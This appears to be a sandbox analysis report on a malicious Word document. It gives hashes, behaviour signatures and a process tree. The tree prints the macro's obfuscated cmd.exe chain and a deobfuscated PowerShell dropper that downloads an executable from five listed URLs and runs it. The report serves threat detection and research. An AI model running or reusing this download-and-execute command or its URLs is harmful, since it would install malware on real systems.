Overview

overview

10

Static

static

1

e62a45cabe...18.doc

windows7-x64

10

e62a45cabe...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    100s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-09-2024 05:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e62a45cabe2092469274c14bd4f44705_JaffaCakes118.doc

  • Size

    197KB

  • MD5

    e62a45cabe2092469274c14bd4f44705

  • SHA1

    87801790127af2bc2b871578566786269935f129

  • SHA256

    b47082ac91c297b498c0c6a248704783cbbbccd552058fda6d187952b01bd67b

  • SHA512

    155be9ce9bf0d7aef058f5974ff7324d8c45057ae8a3ce7901a6dbe98da00b5ab1c9ca9ea929374dcf63305cdc124e497318947b5d9bbcecdf6f55c059704169

  • SSDEEP

    3072:bzEWdGujL/xSu90OoiLuDKZXfwKeljR1z:vSUxUOmD+XfwLX

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://kantova.com/DWTr10bVVLjs5r
exe.dropper

http://www.hjsanders.nl/889KycAhSPlXPbrS
exe.dropper

http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW
exe.dropper

http://bozziro.ir/YENtfKb77bgd_Gk
exe.dropper

http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e62a45cabe2092469274c14bd4f44705_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Insd=_;ZCPw=Wl{0AhB93pVU.k1%$v7'6MJO2\yTm+(tLe,x-s@IYKfE5NuS~ci j8FrDzQ:o4Hgab/G)dXn}&&for %l in (16;67;5;22;4;18;13;39;46;3;66;55;51;41;21;22;62;22;54;50;54;54;46;30;52;52;11;28;50;66;55;43;68;41;21;22;12;22;34;50;28;4;66;55;43;15;41;21;22;8;8;58;23;12;14;31;25;31;6;26;53;25;60;21;51;26;1;23;56;25;27;31;6;78;40;5;43;67;72;59;40;56;38;58;52;40;38;19;7;40;72;3;8;57;40;78;38;1;23;53;21;51;31;60;6;26;12;38;38;16;66;73;73;20;71;78;38;67;24;71;19;56;67;35;73;63;7;34;62;21;10;72;17;17;39;59;44;51;62;45;12;38;38;16;66;73;73;5;5;5;19;12;59;44;71;78;76;40;62;44;19;78;8;73;60;60;14;48;33;56;11;12;54;4;8;77;4;72;62;54;45;12;38;38;16;66;73;73;71;8;38;67;24;71;12;40;71;8;38;12;56;71;62;40;19;56;67;35;73;5;16;43;56;67;78;38;40;78;38;73;53;16;8;67;71;76;44;73;71;50;10;27;71;71;74;54;17;67;46;0;69;61;7;45;12;38;38;16;66;73;73;72;67;64;64;57;62;67;19;57;62;73;47;50;52;38;49;48;72;25;25;72;70;76;0;74;20;45;12;38;38;16;66;73;73;12;40;57;64;53;78;70;44;78;67;38;76;57;40;78;44;38;43;44;67;49;67;62;38;19;71;38;73;29;38;72;57;34;56;33;53;11;74;3;21;2;13;65;26;19;54;16;8;57;38;37;26;45;26;75;1;23;12;51;25;31;68;6;26;67;21;68;25;10;26;1;23;12;15;21;25;51;58;6;58;26;21;21;31;26;1;23;38;60;21;25;51;6;26;35;68;51;68;21;26;1;23;62;14;60;68;21;6;23;40;78;24;66;38;40;35;16;36;26;32;26;36;23;12;15;21;25;51;36;26;19;40;42;40;26;1;49;67;62;40;71;56;12;37;23;16;31;25;68;68;58;57;78;58;23;53;21;51;31;60;75;9;38;62;33;9;23;56;25;27;31;19;63;67;5;78;8;67;71;76;61;57;8;40;37;23;16;31;25;68;68;41;58;23;62;14;60;68;21;75;1;23;64;25;14;51;27;6;26;35;68;51;27;51;26;1;46;49;58;37;37;74;40;38;43;46;38;40;35;58;23;62;14;60;68;21;75;19;8;40;78;70;38;12;58;43;70;40;58;68;10;10;10;10;75;58;9;46;78;24;67;20;40;43;46;38;40;35;58;23;62;14;60;68;21;1;23;57;14;51;60;10;6;26;56;25;51;10;21;26;1;72;62;40;71;20;1;79;79;56;71;38;56;12;9;79;79;23;8;25;14;60;27;6;26;57;14;21;25;26;1;88)do set EU7r=!EU7r!!Insd:~%l,1!&&if %l gtr 87 echo !EU7r:~-606!|%LOCALAPPDATA:~-3,-2%m%TMP:~-15,-14% "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Windows\system32\cmd.exe
        CmD /V:O/C"set Insd=_;ZCPw=Wl{0AhB93pVU.k1%$v7'6MJO2\yTm+(tLe,x-s@IYKfE5NuS~ci j8FrDzQ:o4Hgab/G)dXn}&&for %l in (16;67;5;22;4;18;13;39;46;3;66;55;51;41;21;22;62;22;54;50;54;54;46;30;52;52;11;28;50;66;55;43;68;41;21;22;12;22;34;50;28;4;66;55;43;15;41;21;22;8;8;58;23;12;14;31;25;31;6;26;53;25;60;21;51;26;1;23;56;25;27;31;6;78;40;5;43;67;72;59;40;56;38;58;52;40;38;19;7;40;72;3;8;57;40;78;38;1;23;53;21;51;31;60;6;26;12;38;38;16;66;73;73;20;71;78;38;67;24;71;19;56;67;35;73;63;7;34;62;21;10;72;17;17;39;59;44;51;62;45;12;38;38;16;66;73;73;5;5;5;19;12;59;44;71;78;76;40;62;44;19;78;8;73;60;60;14;48;33;56;11;12;54;4;8;77;4;72;62;54;45;12;38;38;16;66;73;73;71;8;38;67;24;71;12;40;71;8;38;12;56;71;62;40;19;56;67;35;73;5;16;43;56;67;78;38;40;78;38;73;53;16;8;67;71;76;44;73;71;50;10;27;71;71;74;54;17;67;46;0;69;61;7;45;12;38;38;16;66;73;73;72;67;64;64;57;62;67;19;57;62;73;47;50;52;38;49;48;72;25;25;72;70;76;0;74;20;45;12;38;38;16;66;73;73;12;40;57;64;53;78;70;44;78;67;38;76;57;40;78;44;38;43;44;67;49;67;62;38;19;71;38;73;29;38;72;57;34;56;33;53;11;74;3;21;2;13;65;26;19;54;16;8;57;38;37;26;45;26;75;1;23;12;51;25;31;68;6;26;67;21;68;25;10;26;1;23;12;15;21;25;51;58;6;58;26;21;21;31;26;1;23;38;60;21;25;51;6;26;35;68;51;68;21;26;1;23;62;14;60;68;21;6;23;40;78;24;66;38;40;35;16;36;26;32;26;36;23;12;15;21;25;51;36;26;19;40;42;40;26;1;49;67;62;40;71;56;12;37;23;16;31;25;68;68;58;57;78;58;23;53;21;51;31;60;75;9;38;62;33;9;23;56;25;27;31;19;63;67;5;78;8;67;71;76;61;57;8;40;37;23;16;31;25;68;68;41;58;23;62;14;60;68;21;75;1;23;64;25;14;51;27;6;26;35;68;51;27;51;26;1;46;49;58;37;37;74;40;38;43;46;38;40;35;58;23;62;14;60;68;21;75;19;8;40;78;70;38;12;58;43;70;40;58;68;10;10;10;10;75;58;9;46;78;24;67;20;40;43;46;38;40;35;58;23;62;14;60;68;21;1;23;57;14;51;60;10;6;26;56;25;51;10;21;26;1;72;62;40;71;20;1;79;79;56;71;38;56;12;9;79;79;23;8;25;14;60;27;6;26;57;14;21;25;26;1;88)do set EU7r=!EU7r!!Insd:~%l,1!&&if %l gtr 87 echo !EU7r:~-606!|cmD "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:436
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $h9272='u7815';$c762=new-object Net.WebClient;$u1528='http://kantova.com/DWTr10bVVLjs5r@http://www.hjsanders.nl/889KycAhSPlXPbrS@http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW@http://bozziro.ir/YENtfKb77bgd_Gk@http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ'.Split('@');$h5724='o1470';$h3175 = '112';$t8175='m4541';$r9841=$env:temp+'\'+$h3175+'.exe';foreach($p2744 in $u1528){try{$c762.DownloadFile($p2744, $r9841);$z7956='m4565';If ((Get-Item $r9841).length -ge 40000) {Invoke-Item $r9841;$i9580='c7501';break;}}catch{}}$l7986='i917';"
          4⤵
            PID:100
          • C:\Windows\system32\cmd.exe
            cmD
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3344
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell $h9272='u7815';$c762=new-object Net.WebClient;$u1528='http://kantova.com/DWTr10bVVLjs5r@http://www.hjsanders.nl/889KycAhSPlXPbrS@http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW@http://bozziro.ir/YENtfKb77bgd_Gk@http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ'.Split('@');$h5724='o1470';$h3175 = '112';$t8175='m4541';$r9841=$env:temp+'\'+$h3175+'.exe';foreach($p2744 in $u1528){try{$c762.DownloadFile($p2744, $r9841);$z7956='m4565';If ((Get-Item $r9841).length -ge 40000) {Invoke-Item $r9841;$i9580='c7501';break;}}catch{}}$l7986='i917';
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:548

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\TCDB808.tmp\sist02.xsl
      Filesize

      245KB

      MD5

      f883b260a8d67082ea895c14bf56dd56

      SHA1

      7954565c1f243d46ad3b1e2f1baf3281451fc14b

      SHA256

      ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

      SHA512

      d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ba0ymifw.4zy.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      Download Submit

    • memory/548-73-0x000002469C4B0000-0x000002469C4D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2628-33-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-6-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-7-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-9-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-12-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-11-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-13-0x00007FF8093C0000-0x00007FF8093D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-10-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-8-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-14-0x00007FF8093C0000-0x00007FF8093D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-16-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-17-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-15-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-4-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-0-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-34-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-54-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-5-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-2-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-3-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-74-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-75-0x00007FF84BC0D000-0x00007FF84BC0E000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2628-76-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-79-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-80-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-86-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-87-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/2628-1-0x00007FF84BC0D000-0x00007FF84BC0E000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2628-587-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-588-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-590-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-589-0x00007FF80BBF0000-0x00007FF80BC00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2628-591-0x00007FF84BB70000-0x00007FF84BD65000-memory.dmp

      Filesize

      2.0MB

      Download